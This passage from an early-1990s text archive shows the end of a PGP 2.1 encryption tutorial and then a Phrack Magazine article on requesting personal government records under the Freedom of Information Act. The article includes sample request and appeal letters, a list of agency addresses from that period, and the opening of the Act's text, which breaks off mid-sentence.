  9121. mQCNAisuyi4AAAEEAN+cY6nUU+VIhYOqBfcc12rEMph+A7iadUi8xQJ00ANvp/iF
  9122. +ugZ+GP2ZnzA0fob9cG/MVbh+iiz3g+nbS+ZljD2uK4VyxZfu5alsbCBFbJ6Oa8K
  9123. /c/e19lzaksSlTcqTMQEae60JUkrHWpnxQMM3IqSnh3D+SbsmLBs4pFrfIw9AAUR
  9124. tCRUaGUgUmFja2V0ZWVyIDxyYWNrQGx5Y2FldW0uaGZjLmNvbT4=
  9125. =6rFE
  9126. -----END PGP PUBLIC KEY BLOCK-----
  9127.  
  9128.         This can be tagged to the bottom of whatever E-Mail message you want to
  9129. send or whatever.  This key can added to someone else's public key ring and
  9130. thereby used to encrypt information so that it can be sent to you.  Most people
  9131. who use this on USENET add it onto their signature files so that it is
  9132. automatically posted on their messages.
  9133.  
  9134.         Let's assume someone else wanted to communicate with you.  As a result,
  9135. they sent you their own Public Key:
  9136.  
  9137. -----BEGIN PGP PUBLIC KEY BLOCK-----
  9138. Version: 2.1
  9139.  
  9140. mQA9AitgcOsAAAEBgMlGLWl8rub0Ulzv3wpxI5OFLRkx3UcGCGsi/y/Qg7nR8dwI
  9141. owUy65l9XZsp0MUnFQAFEbQlT25lIER1bWIgUHVkIDwxRHVtUHVkQG1haWxydXMu
  9142. Yml0bmV0Pg==
  9143. =FZBm
  9144. -----END PGP PUBLIC KEY BLOCK-----
  9145.  
  9146.         Notice this guy, Mr. One Dumb Pud, used a smaller key size than you
  9147. did.  This shouldn't make any difference because PGP detects this
  9148. automatically.  Let's now add the schlep onto your key ring.
  9149.  
  9150. C:\> pgp -ka dumbpud.asc
  9151. Pretty Good Privacy 2.1 - Public-key encryption for the masses.
  9152. (c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
  9153. Date: 1993/01/22 22:17 GMT
  9154.  
  9155. Key ring: 'c:\pgp\pubring.$01'
  9156. Type bits/keyID   Date       User ID
  9157. pub   384/C52715  1993/01/22 One Dumb Pud <1DumPud@mailrus.bitnet>
  9158.  
  9159. New key ID: C52715
  9160.  
  9161. Keyfile contains:
  9162.    1 new key(s)
  9163. Adding key ID C52715 from file 'dumbpud.asc' to key ring 'c:\pgp\pubring.pgp'.
  9164.  
  9165. Key for user ID: One Dumb Pud <1DumPud@mailrus.bitnet>
  9166. 384-bit key, Key ID C52715, crated 1993/01/22
  9167. This key/userID associate is not certified.
  9168.  
  9169. Do you want to certify this key yourself (y/N)?  n {We'll deal with this later}
  9170.  
  9171.         Okay, now we have the guy on our key ring.  Let's go ahead and encrypt
  9172. a file for the guy.  How about having the honor of an unedited copy of this
  9173. file?
  9174.  
  9175. C:\> pgp -e encrypt One                     {PGP has automatic name completion}
  9176. Pretty Good Privacy 2.1 - Public-key encryption for the masses.
  9177. (c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
  9178. Date: 1993/01/22 22:24 GMT
  9179.  
  9180.  
  9181. Recipient's public key will be used to encrypt.
  9182. Key for user ID: One Dumb Pud <1DumPud@mailrus.bitnet>
  9183. 384-bit key, Key ID C52715, created 1993/01/22
  9184.  
  9185. WARNING:  Because this public key is not certified with a trusted
  9186. signature, it is not known with high confidence that this public key
  9187. actually belongs to: "One Dumb Pud <1DumPud@mailrus.bitnet>".
  9188.  
  9189. Are you sure you want to use this public key (y/N)? y
  9190. ------------------------------------------------------------------------------
  9191.  
  9192.  
  9193.  
  9194.  
  9195. Date:     Wed Mar 24, 1993  1:04 pm  PST
  9196. From:     phrack
  9197.           EMS: INTERNET / MCI ID: 376-5414
  9198.           MBX: phrack@stormking.com
  9199.  
  9200. TO:       Thomas J. Klotzbach / MCI ID: 375-1365
  9201. TO:       Proctor & Associates / MCI ID: 399-1080
  9202. TO:       Peter Nesbitt / MCI ID: 511-1312
  9203. TO:     * Berton Corson / MCI ID: 528-0397
  9204. TO:       Michael W. Carroll / MCI ID: 557-1860
  9205. TO:       Michael McMahon / MCI ID: 585-7625
  9206. TO:       Multiple recipients of list
  9207.           EMS: INTERNET / MCI ID: 376-5414
  9208.           MBX: phrack@stormking.com
  9209. Subject:  Phrack 42/12-14
  9210.  
  9211.                               ==Phrack Magazine==
  9212.  
  9213.                   Volume Four, Issue Forty-Two, File 12 of 14
  9214.  
  9215.  
  9216.                   %@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
  9217.                   | The Freedom of Information Act and You  |
  9218.                   |                                         |
  9219.                   |                   by                    |
  9220.                   |               Vince Niel                |
  9221.                   |                                         |
  9222.                   %@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
  9223.  
  9224.  
  9225.     As we all know of our United State government in the modern era, Big
  9226. Brother is watching.  It is naive to think that we do not live in a world
  9227. similar to the one described is George Orwell's novel, 1984.  The government
  9228. keeps tabs on everything we do.  The federal government has thousands of
  9229. documents concerning individual citizens.  For example:
  9230.  
  9231. If you have worked for a federal agency or government contractor or have been
  9232. a member of any branch of the armed services, the federal government has a
  9233. file on you.
  9234.  
  9235. If you have participated in any federally financed project, some agency
  9236. probably has a record of it.
  9237.  
  9238. If you have been arrested by local, state or federal authorities and your
  9239. fingerprints were taken, the FBI maintains a record of you and that arrest.
  9240.  
  9241. If you have applied for or received a student loan or grant certified by the
  9242. government, the Department of Health, Education, and Welfare has recorded the
  9243. information.
  9244.  
  9245. If you have applied for or been investigated for a security clearance for any
  9246. reason, the Department of Defense has a record of you.
  9247.  
  9248.     And these records are not just records of application.  Take for example
  9249. the FBI.  Once you commit a crime, they are watching you.  They update your
  9250. file every time there is a major occurrence in your life i.e. marriage,
  9251. hospitalization, joining the military, committing another crime, etc.  If they
  9252. find the least likelihood of suspicion, they investigate you in depth to add
  9253. even more to your file.  People do not even realize how large their FBI file
  9254. is.
  9255.  
  9256.     If you were ever on a pirate board that got busted, and you had your info
  9257. on there, all the users' info on the bulletin board is transferred to the
  9258. federal government.  There a file is opened up for each individual user.  And
  9259. if you ever get in trouble with the law, that file will be opened up and used
  9260. against you if necessary.  Before I continue, I would like to site an example
  9261. of a man who ordered his file from the army.  This file was created when he
  9262. applied for a security clearance with the military years before.  In it said:
  9263.  
  9264. ..  He owed 50 cents to his high school for not returning his locker key.
  9265. ..  He dated 2 or 3 times a week, and was not intimate with his dates.
  9266. ..  He was irresponsible because he owed a $5 jaywalking ticket in Seattle.
  9267.  
  9268.     So what can you do about this big bureaucratic machine we call our
  9269. government?  Simple, fight back!  The Freedom of Information Act (FOIA as it
  9270. will be referred to) was passed and allows you to obtain your personal records
  9271. from any governmental agency.  A typeup of most of the agencies plus the
  9272. actual act can be found at the end of this file.
  9273.  
  9274.     There are restrictions to the act, but it can be quite useful to any
  9275. individual who has had run-ins with the law or who just wants to know what the
  9276. federal government has on him.  You can even go to court against the
  9277. government if a document is denied to you and you think you deserve to see it.
  9278. The act is not widely know, and for good reason.  The government doesn't want
  9279. you to know what they are doing.  But alas, the information will be set free,
  9280. the people have a right to know!
  9281.  
  9282.     And don't think that the only interesting documents are the ones from the
  9283. FBI and CIA.  Fascinating documents can be gotten from the IRS, Department of
  9284. Health, Department of Schools, Federal Traffic Administration, HUD, National
  9285. Credit Union, with information you will never believe people who actually
  9286. store about you.
  9287.  
  9288.  
  9289.     The Specifics of Asking For Your Personal File From a Particular Agency
  9290.     -----------------------------------------------------------------------
  9291.  
  9292.     First of all, I would like to bring up a major misconception people make.
  9293. Most people assume that if you ask for your file from the FBI, and there isn't
  9294. a file on you, one will be created for you.  That is an untrue and extremely
  9295. paranoid statement.  The government has better things to do then open up files
  9296. on curious citizens.  And even if by some remote chance they do open up a file
  9297. for you, who cares?  They have a files on millions of people, its not like it
  9298. will hinder you in life.  Just be careful out there, that is all I can say.
  9299.  
  9300.     The most important thing that can be done when asking for information from
  9301. a governmental agency under the FOIA is to make it as brief, concise, and
  9302. specific as possible.  In this way, you will get your information, or refusal
  9303. as soon as possible, and you will also curb copying fees (which will be
  9304. discussed later).  First you have to find the agency that concerns you.  If
  9305. you are not sure which agency to apply to, send your letter to more than one.
  9306. There will be a list of agencies at the end of this file, but a complete list
  9307. of agencies can be found in the United States Government Manual.  This can be
  9308. found at any library.
  9309.  
  9310.     The request should be addressed to the agency's FOIA officer or to the
  9311. head of the specific agency.  Most agencies have a secretary to deal with all
  9312. the FOIA applications.  The smaller agencies, which you probably will not be
  9313. concerned with, might not have an officer.  On the bottom left hand corner of
  9314. the envelope "Freedom of Information Act Request" should be printed legibly.
  9315. This guarantees that your letter won't get caught in the paperwork shuffle.
  9316.  
  9317.     All agencies has FOIA regulation that you should look at.  They do not
  9318. want to send out 'sensitive' documents and whatnot.  These regulations also
  9319. describe the request process in detail.  Here you can also find out what
  9320. specific document you are looking for, reducing fees from the agency.  These
  9321. regulations can be found in "The Code of Federal Regulations", which can also
  9322. be found at your local library.
  9323.  
  9324.     Most agencies require that you get your letter 'notarized' or they won't
  9325. even look at it.  This prevents you from impersonating someone else and
  9326. getting their file.  To get your letter notarized, all you have to do is go to
  9327. your local bank.  Show some proof that the person signing the letter is you
  9328. (with an id or something) and they will notarize it.  Now the government has
  9329. no excuse for not taking your letter.
  9330. There are four parts to an FOIA request letter:
  9331.  
  9332.     1) Request being made under the FOIA.
  9333.     2) Records that are sought, as specifically as possible.
  9334.     3) Name and address of the person requesting the information.  Telephone
  9335.        number is not necessary, but you will find out about the outcome of
  9336.        your request much quicker.
  9337.     4) How much money you are willing to spend for the document (explained
  9338.        later).
  9339.  
  9340. Here is a sample letter, just fill in your information:
  9341.  
  9342. -----------------------------------------------------------------------------
  9343.  
  9344. Agency Head [or Freedom of Information Act Officer]
  9345. Name of Agency
  9346. Address of Agency
  9347. City, State, Zip Code
  9348.  
  9349. Re: Freedom of Information Act Request
  9350.  
  9351.     I request a copy of the following documents [or documents containing the
  9352. following information if you do not know the specific name of the document] be
  9353. provided for me: [identify the documents as accurately as possible]
  9354.  
  9355.     In order to help determine my status to assess fees, you should know that
  9356. I am an individual seeking information for personal use and not for commercial
  9357. use.  [always, always say you are an individual.  That way, you will not have
  9358. to pay extra fees because you are part of the media or a commercial endeavor.]
  9359.  
  9360.     [Optional] I am willing to pay fees for this request up to a maximum of
  9361. $__.  If you estimate the fees will exceed this limit, please inform me first.
  9362.  
  9363.     [Optional] I request a waiver of all fees for this request.  Disclosure of
  9364. the requested information to me is in the public interest because it is likely
  9365. to contribute significantly to public understanding of the operations or
  9366. activities  of the government and is not primarily in my commercial interest
  9367. [include specific information].
  9368.  
  9369.     Thank you for your consideration of this request.
  9370.  
  9371.                     Sincerely,
  9372.  
  9373.                     Name
  9374.                     Address
  9375.                     City, State, Zip Code
  9376.                     Telephone Number [Optional]
  9377. -----------------------------------------------------------------------------
  9378.  
  9379. Some of the things in the letter may not be understood at first, but I will
  9380. get to them.
  9381.  
  9382.  
  9383. Money:
  9384.  
  9385.     As you might have guessed, getting information under the FOIA is not free,
  9386. but it can be cheapened if you play your cards right.  As specified in the
  9387. letter, always say that you are an individual seeking information not for
  9388. commercial purposes.  Review is the process of going through documents and
  9389. checking if they can be sent to you or not.  Under the law, if you are a
  9390. private individual and are not requesting information for commercial purposes,
  9391. you cannot be charged with review fees!
  9392.  
  9393.     All agencies have set fees for copying a document.  Fees can also be taken
  9394. for searching for a document.  If you are an individual, you will be charged
  9395. the least amount of money.  Of course, if you have no idea in hell what the
  9396. name of the document is, and you are stabbing in the dark it is a good idea to
  9397. write in a set amount you are willing to spend.  When the amount is reached,
  9398. you will be notified.  This is in the letter above.
  9399.  
  9400.     You don't want to be jacked for a bill of 150 bucks if you send them a
  9401. letter 'just send me everything you got on me'.  Even if you have no idea what
  9402. they have, you can say 'please send me all the dossiers, legal documents, and
  9403. records you have under my name'.  Remember, the government likes bureaucratic
  9404. bullshit.  If you do not phrase you letter right, they will nail you on it.  A
  9405. lot of agencies will waive the cost of processing if it is under $3, and even
  9406. if you receive a bill, it should not exceed 5-10 dollars.
  9407.  
  9408.     If you can somehow prove that by accessing this information, it will help
  9409. the general public understand how the government works, you can waive the fee
  9410. altogether.  If through some form of shrewd doublespeak you can think of
  9411. something clever to satisfy this obligation, you can then request huge amounts
  9412. of documents, without paying a cent for them.
  9413.  
  9414. Restrictions:
  9415.  
  9416.     Of course, there are restrictions to the Freedom of Information Act.  Some
  9417. documentation may be said to be sensitive and out of reach of the public eye.
  9418. Any refusal to grant information through the FOIA may be taken to court, and
  9419. won.  In the act, it states that cases brought up because of the FOIA should
  9420. be put first on the court docket and tried as soon as possible.  Its always
  9421. worth a try.
  9422.  
  9423.     When a record contains some information that is withheld, it does not
  9424. necessarily mean that the whole record is exempt.  The federal agency is
  9425. obliged to cut out the portion that is sensitive, and send you the portion it
  9426. can disclose.  The agency must also give you a reason why it cut out this
  9427. portion of the document.
  9428.  
  9429. Here are a few of the reasons for exemption:
  9430.  
  9431. 1) Classified Documents - Classified Documents may be withheld.  The documents
  9432.    may be classified in the interest of national defense and foreign policy.
  9433.    Classified documents may still be requested.  The agency will review the
  9434.    document to determine whether it still needs protection.  If a requested
  9435.    document is already declassified, it can be easily requested.
  9436.  
  9437. 2) Internal Personal Rules and Practices - This exemption covers matters
  9438.    related to an agency's internal rules and practices.  Requests for Internal
  9439.    schedules, administrative manuals and the like can be refused.
  9440.  
  9441. 3) Confidential Business Information - Trade secrets or commercially valuable
  9442.    plans do not have to be released.  Commercial or financial information does
  9443.    not also have to be released, as it might hurt an individual.
  9444.  
  9445. 4) Personal Privacy - This covers personnel, medical, and similar files of
  9446.    which disclosed would interfere with personal privacy.  This exemption has
  9447.    importance because it prevents a commercial business from getting
  9448.    information about you.  At the same time, it allows you to get private
  9449.    information stored about yourself.  This is why it is important to get your
  9450.    letter notarized.
  9451.  
  9452. 5) Law Enforcement - This allows law enforcement agencies to withhold law
  9453.    enforcement records in order to protect themselves and others.  If there is
  9454.    a trial going on, you can't request your file.  Its smart to get your file
  9455.    from the feds now, while you still can.  Don't wait until you get in some
  9456.    serious shit, and then you don't even know what they have on you!  If you
  9457.    know what they have on you, you know how to fight back.
  9458.  
  9459.     If you request does get refused, there is still hope.  If you think that
  9460. under the FOIA's legal terms you deserve to have the document, you can send a
  9461. letter of appeal.  This letter can also be used to argue that their processing
  9462. charge was unfair.  The appeal letter is shown below:
  9463.  
  9464. ------------------------------------------------------------------------------
  9465.  
  9466. Agency Head or Appeal Officer
  9467. Name of Agency
  9468. Address of Agency
  9469. City, State, Zip Code
  9470.  
  9471. Re: Freedom of Information Act Appeal
  9472.  
  9473. Dear:
  9474.       This is an appeal under the Freedom of Information Act.
  9475.  
  9476.     On (date), I requested documents under the Freedom of Information Act.  My
  9477. request was assigned the following identification number: ______.  On (date),
  9478. I received a response to my request in a letter signed by (name of official).
  9479. I appeal the denial of my request.
  9480.  
  9481.     [Optional] The documents that were withheld must be disclosed under the
  9482. FOIA because...
  9483.  
  9484.     [Optional] I appeal the decision to deny my request for a waiver of fees.
  9485. I believe that I am entitles to a waiver of fees.  Disclosure of the documents
  9486. I requested is in the public interest because the information is likely to
  9487. contribute significantly to public understanding of the operations or
  9488. activities of government and is not primarily in my commercial interest.
  9489. (Provide Details)
  9490.  
  9491.     [Optional]  I appeal the decision to require me to pay review costs for
  9492. this request.  I am not seeking this document for commercial use.  (Provide
  9493. Details)
  9494.  
  9495.  
  9496.     Thank you for your consideration of this appeal.
  9497.  
  9498.                       Sincerely,
  9499.  
  9500.                       Name
  9501.                       Address
  9502.                       City, State, Zip Code
  9503.                       Telephone Number [Optional]
  9504. ------------------------------------------------------------------------------
  9505.  
  9506.  
  9507. Here is a listing of a few government agencies that hold records on individual
  9508. citizens:
  9509.  
  9510. Agriculture
  9511.      Department of Agriculture
  9512.      Washington, D.C. 20250
  9513.  
  9514. Air Force
  9515.      Department of the Air Force
  9516.      The Pentagon
  9517.      Washington, D.C. 20330
  9518.  
  9519. Alcohol, Drug Abuse, and Mental Health
  9520.      Alcohol, Drug Abuse, and Mental Health Administration
  9521.      5600 Fisher Lane
  9522.      Rockville, Maryland 20857
  9523.  
  9524. Alcohol, Tobacco and Firearms
  9525.      Bureau of Alcohol, Tobacco, and Firearms
  9526.      1200 Pennsylvania Avenue, N.W.
  9527.      Washington, D.C. 20226
  9528.  
  9529. American Battle Monuments
  9530.      American Battle Monuments Commission:
  9531.      40014 Forrestal Bldg.
  9532.      Washington, D.C. 20314
  9533.  
  9534. Appalachian Regional
  9535.      Appalachian Regional Commission:
  9536.      1666 Connecticut Avenue, N.W.
  9537.      Washington, D.C. 20235
  9538.  
  9539. Arms Control and Disarmament
  9540.      U.S. Army Control and Disarmament Agency
  9541.      320 21st Street
  9542.      Washington, D.C. 20451
  9543.  
  9544. Army
  9545.      Department of the Army
  9546.      The Pentagon
  9547.      Washington, D.C. 20314
  9548.  
  9549. Census
  9550.      Bureau of the Census
  9551.      Federal Building 3
  9552.      Washington, D.C. 20233
  9553.  
  9554. CIA
  9555.      Central Intelligence Agency
  9556.      Washington, D.C. 20505
  9557.  
  9558. Civil Aeronautics
  9559.      Civil Aeronautics Board
  9560.      1825 Connecticut Avenue, N.W.
  9561.      Washington, D.C. 20428
  9562.  
  9563. Civil Rights
  9564.      Civil Rights Commission
  9565.      1121 Vermont Avenue, N.W.
  9566.      Washington, D.C. 20425
  9567.  
  9568. Civil Service
  9569.      Civil Service Commission
  9570.      1900 E Street, N.W.
  9571.      Washington, D.C. 20415
  9572.  
  9573.  
  9574. Coastal Plains
  9575.      Coastal Plains Regional Commission
  9576.      1725 K Street, N.W.
  9577.      Washington, D.C. 20006
  9578.  
  9579. Commerce
  9580.      Department of Commerce
  9581.      Washington, D.C. 20230
  9582.  
  9583. Community Services
  9584.      Community Services Administration
  9585.      1200 19th Street, N.W.
  9586.      Washington, D.C. 20506
  9587.  
  9588. Consumer Product Safety
  9589.      Consumer Product Safety Commission
  9590.      1111 18th Street, N.W.
  9591.      Washington, D.C. 20207
  9592.  
  9593. Copyright Office
  9594.      Copyright Office
  9595.      Library of Congress
  9596.      Washington, D.C. 20559
  9597.  
  9598. Customs Service
  9599.      U.S. Customs Service
  9600.      1301 Constitution Avenue, N.W.
  9601.      Washington, D.C. 20229
  9602.  
  9603. Defense
  9604.      Department of Defense
  9605.      The Pentagon
  9606.      Washington, D.C. 20301
  9607.  
  9608. Defense Contracts Audits
  9609.      Defense Contracts Audits Agency
  9610.      Cameron Station
  9611.      Alexandria, Virginia 22314
  9612.  
  9613. Defense Intelligence
  9614.      Defense Intelligence Agency
  9615.      RDS-3A
  9616.      Washington, D.C. 20301
  9617.  
  9618. Defense Investigation
  9619.      Defense Investigative Services
  9620.      D0020
  9621.      Washington, D.C. 20304
  9622.  
  9623. Defense Logistical
  9624.      Defense Logistical Agency
  9625.      Cameron Station
  9626.      Alexandria, Virginia, 22314
  9627.  
  9628. Defense Mapping
  9629.      Defense Mapping Agency
  9630.      Naval Observatory
  9631.      Washington, D.C. 20305
  9632.  
  9633. Disease Control
  9634.      Center for Disease Control
  9635.      Atlanta, Georgia 30333
  9636.  
  9637. Economic Development
  9638.      Economic Development Administration
  9639.      Department of Commerce
  9640.      14th & Constitution Avenue, N.W.
  9641.      Washington, D.C. 20230
  9642.  
  9643. Education
  9644.      Office of Education
  9645.      400 Maryland Avenue, S.W.
  9646.      Washington, D.C. 20202
  9647.  
  9648. Energy
  9649.      Department of Energy
  9650.      U.S. Department of Energy
  9651.      Washington, D.C. 20461
  9652. EPA
  9653.      Environmental Protection Agency
  9654.      401 M Street, S.W.
  9655.      Washington, D.C. 20460
  9656.  
  9657. Environmental Quality
  9658.      Council on Environmental Quality
  9659.      722 Jackson Place, N.W.
  9660.      Washington, D.C. 20006
  9661.  
  9662. Equal Employment Opportunity
  9663.      Equal Employment Opportunity Commission
  9664.      2401 E Street, N.W.
  9665.      Washington, D.C. 20506
  9666.  
  9667. Export-Import Bank
  9668.      Export-Import Bank of the U.S.
  9669.      811 Vermont Avenue, N.W.
  9670.      Washington, D.C. 20571
  9671.  
  9672. FAA
  9673.      Federal Aviations Administration
  9674.      800 Independence Avenue, S.W.
  9675.      Washington, D.C. 20591
  9676.  
  9677. FBI
  9678.      Federal Bureau of Investigation
  9679.      9th and Pennsylvania Avenue, N.W.
  9680.      Washington, D.C. 20535
  9681.  
  9682. FCC
  9683.      Federal Communications Commission
  9684.      1919 M Street, N.W.
  9685.      Washington, D.C. 20554
  9686.  
  9687. Federal Elections
  9688.      Federal Election Commission
  9689.      550 17th Street, N.W.
  9690.      Washington, D.C. 20463
  9691.  
  9692. Federal Highways
  9693.      Federal Highway Administration
  9694.      400 7th Street, S.W.
  9695.      Washington, D.C. 20590
  9696.  
  9697. Federal Power
  9698.      Federal Power Commission
  9699.      825 North Capitol Street
  9700.      Washington, D.C. 20426
  9701.  
  9702. Federal Trade
  9703.      Federal Trade Commission
  9704.      6th and Pennsylvania Avenue, N.W.
  9705.      Washington, D.C. 20580
  9706.  
  9707. Food and Drug
  9708.      Food and Drug Administration
  9709.      5600 Fisher Lane
  9710.      Rockville, Maryland 20857
  9711.  
  9712. Foreign Claims Settlement
  9713.      Foreign Claims Settlement Commission
  9714.      1111 20th Street, N.W.
  9715.      Washington, D.C. 20579
  9716.  
  9717. General Accounting
  9718.      General Accounting Office
  9719.      441 G. Street, N.W.
  9720.      Washington, D.C. 20548
  9721.  
  9722. General Services
  9723.      General Services Administration
  9724.      18th and F Streets, N.W.
  9725.      Washington, D.C. 20405
  9726.  
  9727. Health, Education, and Welfare
  9728.      U.S. Department of Health, Education, and Welfare
  9729.      200 Independence Avenue, S.W.
  9730.      Washington, D.C. 20201
  9731.  
  9732. Health Resources
  9733.      Health Resources Administration
  9734.      3700 East West Highway
  9735.      Hyattsville Maryland 20782
  9736.  
  9737. Health Services
  9738.      Health Services Administration
  9739.      5600 Fisher Lane
  9740.      Rockville, Maryland 20857
  9741.  
  9742. HUD
  9743.      Department of Housing and Urban Development
  9744.      Washington, D.C. 20410
  9745.  
  9746. Immigration and Naturalization
  9747.      Immigration and Naturalization Service
  9748.      425 I Street, N.W.
  9749.      Washington, D.C. 20536
  9750.  
  9751. Information Agency
  9752.      U.S. Information Agency
  9753.      1750 Pennsylvania Avenue, N.W.
  9754.      Washington, D.C. 20547
  9755.  
  9756. Interior
  9757.      Department of the Interior
  9758.      18th and C Street, N.W.
  9759.      Washington, D.C. 20240
  9760.  
  9761. IRS
  9762.      Internal Revenue Service
  9763.      1111 Constitution Avenue, N.W.
  9764.      Washington, D.C. 20224
  9765.  
  9766. International Development
  9767.      Agency for International Development
  9768.      21st and Virginia Avenue, N.W.
  9769.      Washington, D.C. 20532
  9770.  
  9771. International Trade
  9772.      International Trade Commission
  9773.      701 E Street, N.W.
  9774.      Washington, D.C. 20436
  9775.  
  9776. ICC
  9777.      Interstate Commerce Commission
  9778.      12th and Constitutional Avenue, N.W.
  9779.      Washington, D.C. 20423
  9780.  
  9781. Justice
  9782.      Department of Justice
  9783.      Washington, D.C. 20530
  9784.  
  9785. Labor
  9786.      Department of Labor
  9787.      Washington, D.C. 20210
  9788.  
  9789. Law Enforcement Assistance
  9790.     Law Enforcement Assistance Administration
  9791.     633 Indiana Avenue, N.W.
  9792.     Washington, D.C. 20230
  9793.  
  9794. National Aeronautics and Space
  9795.     National Aeronautics and Space Administration
  9796.     400 Maryland Avenue, S.W.
  9797.     Washington, D.C. 20546
  9798.  
  9799. National Archives and Records
  9800.     National Archives and Records Service
  9801.     Washington, D.C. 20408
  9802.  
  9803. National Credit Union
  9804.     National Credit Union Administration
  9805.     2025 M Street, N.W.
  9806.     Washington, D.C. 20506
  9807.  
  9808. National Endowment for the Arts
  9809.     National Endowment for the Arts
  9810.     806 15th Street, N.W.
  9811.     Washington, D.C. 20506
  9812.  
  9813. National Endowment for Humanities
  9814.     National Endowment for Humanities
  9815.     806 15th Street, N.W.
  9816.     Washington, D.C. 20506
  9817.  
  9818. National Highway Traffic Safety
  9819.     National Highway Traffic Safety Administration
  9820.     400 7th Street, S.W.
  9821.     Washington, D.C. 20590
  9822.  
  9823. National Institute of Education
  9824.     National Institute of Education
  9825.     1200-19th Street, N.W.
  9826.     Washington, D.C. 20208
  9827.  
  9828. National Institute of Health
  9829.     National Institute of Health
  9830.     9000 Rockville Pike
  9831.     Rockville, Maryland 20014
  9832.  
  9833. National Labor Relations
  9834.     National Labor Relations Board
  9835.     1717 Pennsylvania Avenue, N.W.
  9836.     Washington, D.C. 20570
  9837.  
  9838. National Science Foundation
  9839.     National Science Foundation
  9840.     1800 G Street, N.W.
  9841.     Washington, D.C. 20550
  9842.  
  9843. National Security Agency
  9844.     National Security Agency
  9845.     Fort George Meade, Maryland 20755
  9846.  
  9847. National Security Council
  9848.     National Security Council
  9849.     Old Executive Office Building
  9850.     Washington, D.C. 20506
  9851.  
  9852. National Transportation Safety
  9853.     National Transportation Safety Board
  9854.     800 Independence Avenue, S.W.
  9855.     Washington, D.C. 20594
  9856.  
  9857. Navy
  9858.     Department of the Navy
  9859.     The Pentagon
  9860.     Washington, D.C. 20350
  9861.  
  9862. Nuclear Regulation
  9863.     Nuclear Regulatory Commission
  9864.     Washington, D.C. 20555
  9865.  
  9866.  
  9867.  
  9868. Overseas Private Investment
  9869.     Overseas Private Investment Corporation
  9870.     1129 20th Street, N.W.
  9871.     Washington, D.C. 20527
  9872.  
  9873. Postal Service
  9874.     U.S. Postal Service
  9875.     475 L'Enfant Plaza, S.W.
  9876.     Washington, D.C. 20260
  9877.  
  9878. Prisons
  9879.     Bureau of Prisons
  9880.     320 First Street, N.W.
  9881.     Washington, D.C. 20534
  9882.  
  9883. Public Health
  9884.     Public Health Service
  9885.     200 Independence Avenue, S.W.
  9886.     Washington, D.C. 20201
  9887.  
  9888. Secret Service
  9889.     U.S. Secret Service
  9890.     1800 G Street, N.W.
  9891.     Washington, D.C. 20223
  9892.  
  9893. Securities and Exchange
  9894.     Securities and Exchange Commission
  9895.     500 North Capitol Street
  9896.     Washington, D.C. 20435
  9897.  
  9898. Selective Service
  9899.     Selective Service System
  9900.     600 E Street, N.W.
  9901.     Washington, D.C. 20435
  9902.  
  9903. Small Business
  9904.     Small Business Administration
  9905.     1441 L Street, N.W.
  9906.     Washington, D.C. 20416
  9907.  
  9908. Social Security
  9909.     Social Security Administration
  9910.     6401 Security Blvd.
  9911.     Baltimore, Maryland 21235
  9912.  
  9913. State
  9914.     Department of State
  9915.     Washington, D.C. 20520
  9916.  
  9917. Transportation
  9918.     Department of Transportation
  9919.     400 7th Street, S.W.
  9920.     Washington, D.C. 20590
  9921.  
  9922. Treasury
  9923.     Department of the Treasury
  9924.     1500 Pennsylvania Avenue, N.W.
  9925.     Washington, D.C. 20220
  9926.  
  9927. Urban Mass Transit
  9928.     Urban Mass Transit Administration
  9929.     400 7th Avenue, S.W.
  9930.     Washington, D.C. 20590
  9931.  
  9932. Veterans
  9933.     Administration
  9934.     Vermont Avenue, N.W.
  9935.     Washington, D.C. 20420
  9936.  
  9937.     Here is a copy of the Freedom of Information Act and all of its
  9938. amendments.  It may prove to have some usefulness.  You might want to read
  9939. through it to understand the law better.  I would not recommend reading it if
  9940. you are in a suicidal state.
  9941.  
  9942. ------------------------------------------------------------------------------
  9943.  
  9944.                    FULL TEXT OF FREEDOM OF INFORMATION ACT,
  9945.                     AS AMENDED IN 1974 BY PUBLIC LAW 93-502
  9946.  
  9947.  
  9948. % 552  Public Information; agency rules, opinions, orders, records, and
  9949.     proceedings
  9950.   (a) Each agency shall make available to the public information as follows:
  9951.   (1) Each agency shall separately state and currently publish in the Federal
  9952. Register for the guidance of the public-
  9953.       (A) descriptions of its central and field organization and the
  9954.      established places at which, the employees (and in the case of a
  9955.      uniformed service, the members) from whom, and the method whereby, the
  9956.      public may obtain information, make submittals or requests, or obtain
  9957.      decisions;
  9958.       (B) statements of the general course and method by which its functions
  9959.      are channeled and determined, including the nature and requirements of
  9960.      all formal and informal procedures available;
  9961.       (C) rules of procedures, descriptions of forms available or the places
  9962.      at which forms may be obtained, and instructions as to the scope and
  9963.      contents of all papers, reports, or examinations;
  9964.       (D) substantive rules of general applicability adopted as authorized by
  9965.      law, and statements of general policy or interpretations of general
  9966.      applicability formulated and adopted by the agency; and
  9967.       (E) each amendment, revision, or repeal of the foregoing.
  9968.  
  9969. Except to the extent that a person has actual and timely notice of the terms
  9970. thereof, a person may not in any manner be required to resort to, or be
  9971. adversely affected by, a matter required to be published in the Federal
  9972. Register and not so published.  For the purpose of this paragraph matter
  9973. reasonably available to the class of persons affected thereby is deemed
  9974. published in the Federal Register when incorporated by reference therein with
  9975. the approval of the Director of the Federal Register.
  9976.   (2) Each agency, in accordance with published rules, shall make available
  9977. for public inspection and copying-
  9978.        (A) final opinions, including concurring and dissenting opinions, as
  9979.      well as orders, made in the adjudication of cases;
  9980.        (B) those statements of policy and interpretations which have been
  9981.      adopted by the agency and are not published in the Federal Register; and
  9982.        (C) administrative staff manuals and instructions to staff that affect
  9983.      a member of the public;
  9984.  
  9985. unless the materials are promptly published and copies offered for sale.  To
  9986. the extent required to prevent a clearly unwarranted invasion of personal
  9987. privacy, an agency may delete identifying details when it makes available or
  9988. publishes an opinion, statement of policy, interpretation, or staff manual or
  9989. instruction.  However, inn each case the justification for the deletion shall
  9990. be explained clearly in writing.  Each agency shall also maintain and make
  9991. available for public inspection and copying current indexes providing
  9992. identifying information for the public as to any matter issued, adopted, or
  9993. promulgated after July 4, 1967, and required by this paragraph to be made
  9994. available or published.  Each agency shall promptly, quarterly or more
  9995. frequently, and distribute (by sale or otherwise) copies of each index or
  9996. supplement thereto unless it determines by order published in the Federal
  9997. Register that the publication would be unnecessary and impracticable, in which
